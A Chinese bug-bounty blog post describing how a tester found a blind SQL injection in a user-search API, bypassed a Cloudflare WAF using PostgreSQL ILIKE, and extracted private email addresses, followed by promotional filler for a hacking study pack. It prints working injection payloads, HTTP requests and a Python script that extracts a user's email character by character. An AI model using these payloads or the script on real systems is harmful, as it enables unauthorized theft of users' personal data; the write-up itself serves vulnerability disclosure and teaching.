| 声明:本文涉及的姿势具有攻击性,仅限安全研究,切勿用于非法用途。否则,后果自负! |
|---|
开篇:一次“漫不经心”的API探险
话说某位白帽老哥,闲来无事(划掉),在对一个目标站点进行常规的渗透测试时,偶然发现了一个API端点,长得人畜无害:
https://api.test.com/users/public?page=1&search=bug_vs_me
这玩意儿前端看着就是个用户搜索功能,搜bug_vs_me能找到老哥自己,显示个头像、公开用户名啥的,毛都捞不着一根。
但如果手贱搜了 'bug_vs_me,嘿,啥都没有了!正常人可能觉得是输入错误,一笑而过。但对安全老鸟来说,这味道,有点意思!
抽丝剥茧:从蛛丝马迹中嗅出SQL注入的味道
这位白帽老哥立刻打开Burp的历史记录,开始手动伺候这个查询。
看到了吧,搜deepak,返回结果妥妥的。
再来个骚操作,搜 'OR testing1337,虽然没结果,但是,嘿嘿嘿,SQL报错信息出来了!
这下基本可以断定,SQL注入跑不了了,而且后端大概率是PostgreSQL。
但是!人生最怕的就是这个“但是”!这玩意儿前面架着Cloudflare WAF呢,防护规则那叫一个严丝合缝。SQLMAP上去就是一顿锤,结果全被WAF无情拦截。
原因很简单,SQL注入常用的 IF、OR、AND 等关键字,早就在WAF的黑名单里躺好了。比如,你敢输个 'OR'1'='1,立马给你拉黑!
白帽老哥硬着头皮,花了三个多小时,各种姿势翻遍了,终于找到了突破口,绕过了WAF,提取到了任意用户的邮箱信息。
柳暗花明:ILIKE的“温柔”绕过
这次的SQL注入属于Boolean-Based SQL盲注,说白了就是通过构造不同的查询条件,根据返回结果来判断真假。
老哥仔细研读了PostgreSQL的官方文档,发现了一个叫做 ILIKE 的宝贝,这玩意儿能进行不区分大小写的模式匹配。
于是,一个大胆的想法诞生了:
/users/public?page=1&search={}'+Or+publicusername+ILIKE+'deepak
Bingo!成功返回结果!而且还看到了被屏蔽的邮箱地址。
既然如此,何不直接把邮箱搞到手?
GET /users/public?page=1&search={}'OR+publicusername+ILIKE+'deepak'+AND+username+ILIKE+'deepak@gmail.com HTTP/2Host: api.test.com
注意,publicUsername 存的是公开用户名,而 userName 存的可是非公开的邮箱地址!
这条SQL语句的意思是:在数据库里查,有没有 publicusername ILIKE deepak,并且它的 username 是 deepak@gmail.com。如果都为真,就返回数据;否则,啥都没有。
老哥立马把这个情况反馈给了厂商,并且更进一步,展示了如何通过逐个字符匹配,提取完整的邮箱地址:
GET /users/public?page=1&search={}'OR+publicusername+ILIKE+'deepak'+AND+username+ILIKE+'dee HTTP/2Host: api.test.com
搜 'username' (email) 是不是 'dee' 开头,结果为真,返回数据。
GET /users/public?page=1&search={}'OR+publicusername+ILIKE+'deepak'+AND+username+ILIKE+'deex HTTP/2Host: api.test.com
搜 'username' (email) 是不是 'deex' 开头,结果为假,啥都没有。
一锤定音:PoC脚本的完美演示
厂商一开始还不承认这是SQL注入,觉得老哥在危言耸听。
没办法,老哥只能祭出杀手锏,写了个PoC脚本,只要输入用户的公开用户名,就能在20秒内把邮箱地址扒个精光。
import requests
# Target configuration
host = "https://api.test.com"
base_path = "/users/public"
charset = "abcdefghijklmnopqrstuvwxyz0123456789@._"
headers = {
"User-Agent": "Mozilla/5.0",
"Accept": "application/json"
}
# Ask user for the public username to test
public_username = input("Enter the public_username to extract email for: ").strip()
email_prefix = ""
def is_valid_email(prefix):
payload = f"{{}}'OR+publicusername+ILIKE+'{public_username}'+AND+username+ILIKE+'{prefix}"
url = f"{host}{base_path}?page=1&search={payload}"
try:
r = requests.get(url, headers=headers)
if r.status_code == 200 and '"public":[' in r.text:
data = r.json()
if data["status"] == "success" and data["public"]:
print(f"[+] Valid prefix: {prefix}")
return True
except Exception as e:
print(f"[-] Error: {e}")
return False
print(f"[*] Starting email extraction for public_username: {public_username}")
while True:
found = False
for c in charset:
attempt = email_prefix + c
if is_valid_email(attempt):
email_prefix += c
found = True
break
if not found:
break
# No more characters matched
print(f"[+] Extracted email: {email_prefix}")
这下,厂商终于没话说了,乖乖地把漏洞定级为高危漏洞:
```
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************
扫一扫
从零基础入门到精通,收藏这篇就够了&spm=1001.2101.3001.5002&articleId=148405487&d=1&t=3&u=f11f280e18044b06addbae2556986cf1)
590
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
